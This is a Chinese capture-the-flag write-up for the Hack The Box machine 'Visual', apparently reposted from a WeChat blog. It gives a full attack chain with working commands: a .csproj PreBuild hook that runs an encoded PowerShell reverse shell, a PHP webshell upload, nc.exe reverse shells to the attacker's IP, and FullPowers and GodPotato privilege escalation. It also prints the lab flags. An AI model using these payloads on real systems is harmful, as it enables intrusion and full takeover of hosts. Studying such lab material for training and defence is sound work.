首先扫描靶机
nmap -sC -sV -Pn 10.10.11.234
从上面看,这个靶场只是开了80端口,进去看看
大概浏览一下,这个一个编译程序的网站,右下角有个填写网址,我们本地开个80端口,写自己的服务器
从上面看他连接到了我的server,但是检测到没有git信息,显示404,所以考虑创建一个dotnet项目,并且在我的项目创建git repo,首先新建一个文件夹
mkdir jinitaimeicd jinitaimeidotnet new console -n jinitaimei -f net6.0dotnet new sln --name jinitaimeidotnet sln add ./jinitaimei/
这次我创建的是dotnet6.0,接下来git init
git initgit add .git commit -m "update"git update-server-info
然后使用python打开服务器,在靶场上填写
当网站导出以下文件时,就是已经成功的将文件编译了,接下来在里面加入rec,可以参考这个文章,修改刚刚生成的jinitaimei.csproj文件,添加下面那几段代码
https://learn.microsoft.com/en-us/visualstudio/ide/how-to-specify-build-events-csharp?view=vs-2022
重复上面的命令,修改git commit
git add ./jinitaimei/jinitaimei.csprojgit commit -m "update jinitaimei.csproj"git update-server-info
成功反弹shell,拿到user flag:
88d5f50c8925926910be686d6a3942d5
jinitaimei.csproj代码
<Project Sdk="Microsoft.NET.Sdk"><PropertyGroup><OutputType>Exe</OutputType><TargetFramework>net6.0</TargetFramework><ImplicitUsings>enable</ImplicitUsings><Nullable>enable</Nullable></PropertyGroup><Target Name="PreBuild" BeforeTargets="PreBuildEvent"><Exec Command="powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwADEAIgAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" /></Target></Project>
jinitaimei.sln代码
Microsoft Visual Studio Solution File, Format Version 12.00# Visual Studio Version 16VisualStudioVersion = 16.0.30114.105MinimumVisualStudioVersion = 10.0.40219.1Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "jinitaimei", "jinitaimeijinitaimei.csproj", "{2D930523-5D20-47AF-AB81-CD14D084D320}"EndProjectGlobalGlobalSection(SolutionConfigurationPlatforms) = preSolutionDebug|Any CPU = Debug|Any CPURelease|Any CPU = Release|Any CPUEndGlobalSectionGlobalSection(SolutionProperties) = preSolutionHideSolutionNode = FALSEEndGlobalSectionGlobalSection(ProjectConfigurationPlatforms) = postSolution{2D930523-5D20-47AF-AB81-CD14D084D320}.Debug|Any CPU.ActiveCfg = Debug|Any CPU{2D930523-5D20-47AF-AB81-CD14D084D320}.Debug|Any CPU.Build.0 = Debug|Any CPU{2D930523-5D20-47AF-AB81-CD14D084D320}.Release|Any CPU.ActiveCfg = Release|Any CPU{2D930523-5D20-47AF-AB81-CD14D084D320}.Release|Any CPU.Build.0 = Release|Any CPUEndGlobalSectionEndGlobal
payload
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwADEAIgAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==在C:xampphtdocs路径可以找到网站的架构,尝试上传一个rev的php,进行反弹连接,这次我选择自带的webshells里面的qsd-php-backdoor.php
最下面可以输入靶机的系统命令,直接输入上面的base64的ps payload
成功反弹,但是user的权限不一样的,这次使用FullPowers恢复帐户的默认权限,首先查看一下priv
https://github.com/itm4n/FullPowers
少了那么多,直接使用fullpower工具恢复帐户特权
./FullPowers.exe./FullPowers.exe -x./FullPowers.exe -c "whoami /priv"
FullPowers.exe不能使用-x这个参数,但是可以使用-c参数来运行命令,所以上传nc,然后进行反弹
./FullPowers.exe -c "C:UsersPublicnc.exe 10.10.14.101 4444 -e powershell.exe"
直接输入whoami /priv,可以看到查看很多参数都已经恢复了,已经重置了特权
直接是使用godpotato一把梭哈GodPotato,用的是NET4版本的
https://github.com/BeichenDream/GodPotato
god.exe -cmd "cmd /c whoami"
god.exe -cmd "cmd /c nc.exe -e cmd.exe 10.10.14.101 4444"
成功拿到root flag:11f725712d8dc75f6edc58d487cbdfe2
原文始发于微信公众号(Jiyou too beautiful):HTB-Visual笔记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论